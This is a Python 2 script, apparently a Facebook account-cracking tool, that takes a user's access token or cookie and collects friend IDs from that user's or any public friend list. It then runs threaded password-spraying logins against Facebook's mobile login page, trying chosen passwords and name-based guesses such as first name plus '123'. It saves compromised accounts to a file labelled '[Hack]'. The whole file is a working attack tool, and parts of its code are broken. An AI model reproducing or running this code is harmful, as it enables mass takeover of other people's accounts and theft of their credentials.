#coding=utf-8
#!/usr/bin/python2
import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, requests, uuid
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
try:
    import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, cookielib, requests
    from multiprocessing.pool import ThreadPool
except ImportError:
    os.system('pip2 install requests')
    os.system('pip2 install mechanize')
    os.system('pip2 install tor')
    os.system('pkg install tor')
    os.system('pip2 install mechanize')
    os.system('python2 token100.py')

try:
    os.mkdir('save')
except:
    pass

reload(sys)
sys.setdefaultencoding('utf8')
merah = '\x1b[1;91m'
lime = '\x1b[1;92m'
kuning = '\x1b[1;93m'
biru = '\x1b[1;94m'
ungu = '\x1b[1;95m'
blue = '\x1b[1;96m'
putih = '\x1b[1;97m'
tutup = '\x1b[0m'
try:
    import requests
except ImportError:
    os.system('pip2 install requests')

try:
    import mechanize
except ImportError:
    os.system('pip2 install mechanize')

def keluar():
    print '\x1b[1;97m[!] Exit'
    os.sys.exit()


def acak(x):
    w = 'mhkbpcP'
    d = ''
    for i in x:
        d += '!' + w[random.randint(0, len(w) - 1)] + i

    return cetak(d)


def cetak(x):
    w = 'mhkbpcP'
    for i in w:
        j = w.index(i)
        x = x.replace('!%s' % i, '\x1b[%s;1m' % str(31 + j))

    x += '\x1b[0m'
    x = x.replace('!0', '\x1b[0m')
    sys.stdtoket.write(x + '\n')


def jalan(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.05)


logo = """
       \033[1;91m_____    ____      __  __   _____ 
     \033[1;91m / ____|  / __ \    |  \/  | |_   _|
    \033[1;92m | (___   | |  | |   | \  / |   | |  
    \033[1;92m  \___ \  | |  | |   | |\/| |   | |  
    \033[1;95m  ____) | | |__| |   | |  | |  _| |_ 
    \033[1;95m |_____/   \____/    |_|  |_| |_____| \033[1;92mv 3.2
\033[1;95m⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃
\033[1;95m{\033[1;96m*\033[1;95m} \033[1;93mAuthor \033[1;91m: \033[1;96mSomi Awan
\033[1;95m{\033[1;96m*\033[1;95m} \033[1;93mFacebook \033[1;91m: \033[1;96mSomi Awan
\033[1;95m{\033[1;96m*\033[1;95m} \033[1;93mWhatsAp \033[1;91m: \033[1;96m03455453538
\033[1;95m⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃\033[1;0m
"""

def tik():
    titik = [
     '.   ', '..  ', '... ']
    for o in titik:
        print '\r\x1b[1;97m[+] \x1b[1;97mLogin \x1b[1;97m' + o,
        sys.stdtoket.flush()
        time.sleep(1)


idmem = []
idfriend = []
idfromfriend = []
back = 0
cekrek = []
threads = []
berhasil = []
emteman = []
emfromfriend = []
cekpoint = []
checkpoint = []
oks = []
id = []
auto_total = []
auto_ok = []
auto_cp = []
auto_run = []
listgrup = []
cekrek = []
vulnot = '\x1b[31m   Not Vuln'
vuln = '\x1b[32m   Vuln'

def masuk():
    os.system('clear')
    try:
        toket = open('login.txt', 'r')
        menu()
    except (KeyError, IOError):
        os.system('clear')
        print logo
        print 47 * '\033[1;97m▾'
        print"\033[1;93m╔═══╗ "
        print"\033[1;93m║\033[1;96m 1 \033[1;93m║\033[1;97mLogin With  Facebook Cookies "
        print"\033[1;91m╚═══╝ "
        print"\033[1;93m╔═══╗ "
        print"\033[1;93m║ \033[1;96m2 \033[1;93m║\033[1;97mLogin With Facebook Token"
        print"\033[1;91m╚═══╝ "
        print"\033[1;93m╔═══╗ "
        print"\033[1;93m║ \033[1;93m0 \033[1;93m║\033[1;97mStop Program "
        print"\033[1;91m╚═══╝ "
        print 47 * '\033[1;97m▴'
        pilih_masuk()


def pilih_masuk():
    msuk = raw_input('\033[1;92m--{Select}-->  ')
    if msuk == '':
        print '[!] Isi Yg Benar !'
        pilih_masuk()
    elif msuk == '1' or msuk == '01':
        tokenz()
    elif msuk == '2' or msuk == '02':
        cookie()
    elif msuk == '0' or msuk == '00':
        keluar()
    else:
        print '[!] Isi Yg Benar !'
        pilih_masuk()


def cookie():
    os.system('clear')
    print logo
    print 48 * '-'
    cookie = raw_input('\033[1;97m[\033[1;92m+\033[1;97m] Cookie : ')
    try:
        data = requests.get('https://m.facebook.com/composer/ocelot/async_loader/?publisher=feed#_=_', headers={'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; MI 8 Build/OPM1.171019.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.86 Mobile Safari/537.36', 'referer': 'https://m.facebook.com/',
           'host': 'm.facebook.com',
           'origin': 'https://m.facebook.com',
           'upgrade-insecure-requests': '1',
           'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7',
           'cache-control': 'max-age=0',
           'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
           'content-type': 'text/html; charset=utf-8'}, cookies={'cookie': cookie})
        find_token = re.search('(EAAA\\w+)', data.text)
        hasil = '\n* Fail : maybe your cookie invalid !!' if find_token is None else '\n*   Your fb access token : ' + find_token.group(1)
    except requests.exceptions.ConnectionError:
        print '[!] No Connection'

    cookie = open('login.txt', 'w')
    cookie.write(find_token.group(1))
    cookie.close()
    jalan('\x1b[1;92m\033[1;97m[\033[1;92m+\033[1;97m] Login Successful\x1b[1;97m')
    menu()
    return


def tokenz():
    os.system('clear')
    try:
        toket = open('login.txt', 'r')
        menu()
    except (KeyError, IOError):
        os.system('clear')
        print logo
        print 48 * '-'
        toket = raw_input('[?] Token :\x1b[1;97m ')
        try:
            otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
            a = json.loads(otw.text)
            zedd = open('login.txt', 'w')
            zedd.write(toket)
            zedd.close()
            jalan('\x1b[1;92m\033[1;97m[\033[1;92m+\033[1;97m] Login Successful\x1b[1;97m\x1b[1;97m')
            menu()
        except KeyError:
            print '[\x1b[1;97m!\x1b[1;97m] \x1b[1;97mToken Wrong !'
            time.sleep(1.7)
            tokenz()


def menu():
    global toket
    os.system('clear')
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        print '[!] Token Invalid !'
        os.system('clear')
        os.system('rm -rf login.txt')
        masuk()

    try:
        otw = requests.get('https://graph.facebook.com/me/?access_token=' + toket)
        a = json.loads(otw.text)
        nama = a['name']
    except KeyError:
        os.system('clear')
        print '[!] \x1b[1;97mToken invalid'
        os.system('rm -rf login.txt')
        time.sleep(1)
        masuk()
    except requests.exceptions.ConnectionError:
        print '[!] Erorr'
        keluar()

    os.system('git pull')
    os.system('clear')
    print logo
    
    print 47 * '\033[1;97m▾'
    print '\n\x1b[1;97m[ Welcome \x1b[1;93m' + nama + '\x1b[1;97m ]'
    print"\033[1;93m╔═══╗ "
    print"\033[1;93m║\033[1;96m 1 \033[1;93m║\033[1;97m Start Checking"
    print"\033[1;91m╚═══╝ "
    print"\033[1;93m╔═══╗ "
    print"\033[1;93m║ \033[1;96m2 \033[1;93m║\033[1;97m Join my WhatsApp Group"
    print"\033[1;91m╚═══╝ "
    print"\033[1;93m╔═══╗ "
    print"\033[1;93m║ \033[1;93m0 \033[1;93m║\033[1;97mStop Program "
    print"\033[1;91m╚═══╝ "
    
    print 47 * '\033[1;97m▴'
    pilih_menu()


def pilih_menu():
    peak = raw_input('\033[1;92m--{Select}--> ')
    if peak == '':
        print '[!] \x1b[1;97mIsi yang benar'
        pilih_menu()
    elif peak == '1' or peak == '01':
        passchoice()
    elif peak == '2' or peak == '02':
        uid()
    elif peak == '3' or peak == '03':
        grup()
    elif peak == '4' or peak == '04':
        updatetools()
    elif peak == '0' or peak == '00':
        os.system('rm -rf login.txt')
        keluar()
    else:
        print '[!] \x1b[1;97mIsi yang benar'
        pilih_menu()


def passchoice():
    os.system('clear')
    print logo
    
    print 47 * '\033[1;97m▾'
    print"\033[1;93m╔═══╗ "
    print"\033[1;93m║\033[1;96m 1 \033[1;93m║\033[1;97m ID from Friendlist"
    print"\033[1;91m╚═══╝ "
    print"\033[1;93m╔═══╗ "
    print"\033[1;93m║ \033[1;96m2 \033[1;93m║\033[1;97m ID from Public Friendlost"
    print"\033[1;91m╚═══╝ "
    print"\033[1;93m╔═══╗ "
    print"\033[1;93m║ \033[1;93m0 \033[1;93m║\033[1;97mStop Program "
    print"\033[1;91m╚═══╝ "
    print 47 * '\033[1;97m▴'
    pilih_passxd()


def pilih_passxd():
    global cekpoint
    global oks
    peak = raw_input('\033[1;92m--{Select}-->  ')
    if peak == '':
        print '[!] \x1b[1;97mWarning'
        pilih_passxd()
    elif peak == '1' or peak == '01':
        os.system('clear')
        print logo
        print 47 * '='
        jalan('\033[1;97m[\033[1;92m+\033[1;97m] Take ID')
        r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
        z = json.loads(r.text)
        for s in z['data']:
            uid = s['id']
            na = s['name']
            nm = na.rsplit(' ')[0]
            id.append(uid + '|' + nm)

    elif peak == '2' or peak == '02':
        os.system('clear')
        print logo
        print 47 * '='
        idt = raw_input('\033[1;97m[\033[1;92m+\033[1;97m] Enter ID : ')
        try:
            pok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
            sp = json.loads(pok.text)
            print '\033[1;97m[\033[1;92m+\033[1;97m] Account Name : ' + sp['name']
        except KeyError:
            print '[!] ID Public not available!'
            raw_input('\n [Back]')
            menu()
        except requests.exceptions.ConnectionError:
            print '[!] Warning !'
            keluar()

        r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
        z = json.loads(r.text)
        for i in z['data']:
            uid = i['id']
            na = i['name']
            nm = na.rsplit(' ')[0]
            id.append(uid + '|' + nm)

    elif peak == '0' or peak == '00':
        menu()
    else:
        print '[!] Isi yang benar'
        passchoice()
    pass1 = raw_input('\033[1;97m[\033[1;92m+\033[1;97m] Enter Password 1 \x1b[1;97m:\x1b[1;97m ')
    pass2 = raw_input('\033[1;97m[\033[1;92m+\033[1;97m] Enter Password 2 \x1b[1;97m:\x1b[1;97m ')
    pass3 = raw_input('\033[1;97m[\033[1;92m+\033[1;97m] Enter Password 3 \x1b[1;97m:\x1b[1;97m ')
    
    print 47 * '\033[1;97m▾'
    print '  \x1b[33m   The process is running in background   \x1b[00m'
    
    print 47 * '\033[1;97m▴'

    def main(arg):
        user = arg
        uid, name = user.split('|')
        try:
            rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass1, 'login': 'submit'}, headers={'user-agent': 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]'})
            xo = rex.content
            if 'mbasic_logout_button' in xo or 'save-device' in xo:
                print '\x1b[1;92m[Hacked] ' + uid + ' \xe2\x97\x8a ' + pass1
                oke = open('done/Indo.txt', 'a')
                oke.write('\n[Hack] ' + uid + ' \xe2\x97\x8a ' + pass1)
                oke.close()
                oks.append(uid + pass1)
            elif 'checkpoint' in xo:
                print '\x1b[1;97m[Cekpoint] ' + uid + ' \xe2\x97\x8a ' + pass1
                cek = open('done/Indo.txt', 'a')
                cek.write('\n[Check] ' + uid + ' \xe2\x97\x8a ' + pass1)
                cek.close()
                cekpoint.append(uid + pass1)
            else:
                rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass2, 'login': 'submit'}, headers={'user-agent': 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]'})
                xo = rex.content
                if 'mbasic_logout_button' in xo or 'save-device' in xo:
                    print '\x1b[1;92m[Hacked] ' + uid + ' \xe2\x97\x8a ' + pass2
                    oke = open('done/Indo.txt', 'a')
                    oke.write('\n[Hack] ' + uid + ' \xe2\x97\x8a ' + pass2)
                    oke.close()
                    oks.append(uid + pass2)
                elif 'checkpoint' in xo:
                    print '\x1b[1;97m[Cekpoint] ' + uid + ' \xe2\x97\x8a ' + pass2
                    cek = open('done/Indo.txt', 'a')
                    cek.write('\n[Check] ' + uid + ' \xe2\x97\x8a ' + pass2)
                    cek.close()
                    cekpoint.append(uid + pass2)
                else:
                    rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass3, 'login': 'submit'}, headers={'user-agent': 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]'})
                    xo = rex.content
                    if 'mbasic_logout_button' in xo or 'save-device' in xo:
                        print '\x1b[1;92m[Hacked] ' + uid + ' \xe2\x97\x8a ' + pass3
                        oke = open('done/Indo.txt', 'a')
                        oke.write('\n[Hack] ' + uid + ' \xe2\x97\x8a ' + pass3)
                        oke.close()
                        oks.append(uid + pass3)
                    elif 'checkpoint' in xo:
                        print '\x1b[1;97m[Cekpoint] ' + uid + ' \xe2\x97\x8a ' + pass3
                        cek = open('done/Indo.txt', 'a')
                        cek.write('\n[Check] ' + uid + ' \xe2\x97\x8a ' + pass3)
                        cek.close()
                        cekpoint.append(uid + pass3)
                    else:
                        pass4 = name.lower() + '123'
                        rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass4, 'login': 'submit'}, headers={'user-agent': 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]'})
                        xo = rex.content
                        if 'mbasic_logout_button' in xo or 'save-device' in xo:
                            print '\x1b[1;92m[Hacked] ' + uid + ' \xe2\x97\x8a ' + pass4
                            oke = open('done/Indo.txt', 'a')
                            oke.write('\n[Hack] ' + uid + ' \xe2\x97\x8a ' + pass4)
                            oke.close()
                            oks.append(uid + pass4)
                        elif 'checkpoint' in xo:
                            print '\x1b[1;97m[Cekpoint] ' + uid + ' \xe2\x97\x8a ' + pass4
                            cek = open('done/Indo.txt', 'a')
                            cek.write('\n[Check] ' + uid + ' \xe2\x97\x8a ' + pass4)
                            cek.close()
                            cekpoint.append(uid + pass4)
                        else:
                            pass5 = name.lower() + '12345'
                            rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass5, 'login': 'submit'}, headers={'user-agent': 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]'})
                            xo = rex.content
                            if 'mbasic_logout_button' in xo or 'save-device' in xo:
                                print '\x1b[1;92m[Hacked] ' + uid + ' \xe2\x97\x8a ' + pass5
                                oke = open('done/Indo.txt', 'a')
                                oke.write('\n[Hack] ' + uid + ' \xe2\x97\x8a ' + pass5)
                                oke.close()
                                oks.append(uid + pass5)
                            elif 'checkpoint' in xo:
                                print '\x1b[1;97m[Cekpoint] ' + uid + ' \xe2\x97\x8a ' + pass5
                                cek = open('done/Indo.txt', 'a')
                                cek.write('\n[Check] ' + uid + ' \xe2\x97\x8a ' + pass5)
                                cek.close()
                                cekpoint.append(uid + pass5)
        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print 48 * '-'
    print '\n\x1b[1;97m   [\x1b[1;97m\xe2\x9c\x93\x1b[1;97m] Process Has Been Completed '
    print '[+]  Total \x1b[1;97mOK\x1b[1;97m/\x1b[1;97mCP\x1b[1;97m : ' + str(len(oks)) + '/' + str(len(cekpoint))
    print '[+] Cracking Accounts Has Been Saved : done/Indo.txt'
    print 48 * '-'
    raw_input('\n [Press Enter Go Back To Menu]')
    menu()


def uid():
    os.system('clear')
    print logo
    print 48 * '-'
    print '[1] Search ID Using Username  '
    print '[2] Search Username Using ID  '
    print '[0] Back '
    print 48 * '-'
    search()


def search():
    ud = raw_input('[?] : ')
    if ud == '':
        print '[!] Wrong Input'
        uid()
    elif ud == '1' or uid == '01':
        idf()
    elif ud == '2' or uid == '02':
        us()
    elif ud == '0':
        menu()
    else:
        print '[!] Wrong Input'
        uid()


def idf():
    try:
        u = raw_input('\nInput Username Fb : ')
        url = 'https://www.facebook.com/' + u
        r = requests.get(url).text
        name = re.search('Title">(.*?)</', r).group(1).strip('| Facebook')
        id = re.search('profile/(.*?)" ', r).group(1)
        print '\nNama : ' + name
        print 'Id   : ' + id + '\n'
        raw_input('\n[Back]')
        uid()
    except requests.exceptions.ConnectionError:
        print '[!] Koneksi bermasalah'
        keluar()
    except AttributeError:
        print '[!] Username tidak di temukan'
        raw_input('\n[Back]')
        uid()


def us():
    try:
        u = raw_input('\nInput ID Fb : ')
        url = 'https://www.facebook.com/' + u
        r = requests.get(url).text
        name = re.search('Title">(.*?)</', r).group(1).strip('| Facebook')
        user = re.search('https://www.facebook.com/(.*?)" />', r).group(1)
        print '\nNama     : ' + name
        print 'Username : ' + user + '\n'
        raw_input('\n[Back]')
        uid()
    except requests.exceptions.ConnectionError:
        print '[!] Koneksi bermasalah'
        keluar()
    except AttributeError:
        print '[!] Id tidak di temukan'
        raw_input('\n[Back]')
        uid()


def grup():
    os.system('clear')
    print logo
    print 48 * '-'
    print '\n[1] \xe2\x9d\xa4 Aahil Creations Page \xe2\x9d\xa4'
    print '[2] Aahil ID '
    print '[0] Back'
    print 48 * '-'
    pilih_grup()


def pilih_grup():
    gc = raw_input('[?] : ')
    if gc == '':
        print '[!] Isi Yg Benar'
        pilih_grup()
    elif gc == '1':
        os.system('clear')
        print logo
        print 48 * '-'
        os.system('xdg-open https://www.facebook.com/103679511141844/')
        grup()
    elif gc == '2':
        os.system('clear')
        print logo
        print 48 * '-'
        os.system('xdg-open https://www.facebook.com/aahilrana4072')
        grup()
    elif gc == '0':
        menu()
    else:
        print '[!] Isi Yg Benar'
        pilih_grup()


def updatetools():
    os.system('clear')
    os.system('pip2 install --upgrade ')
    os.system('clear')
    os.system('git pull')


if __name__ == '__main__':
    os.system('git pull')
    masuk()
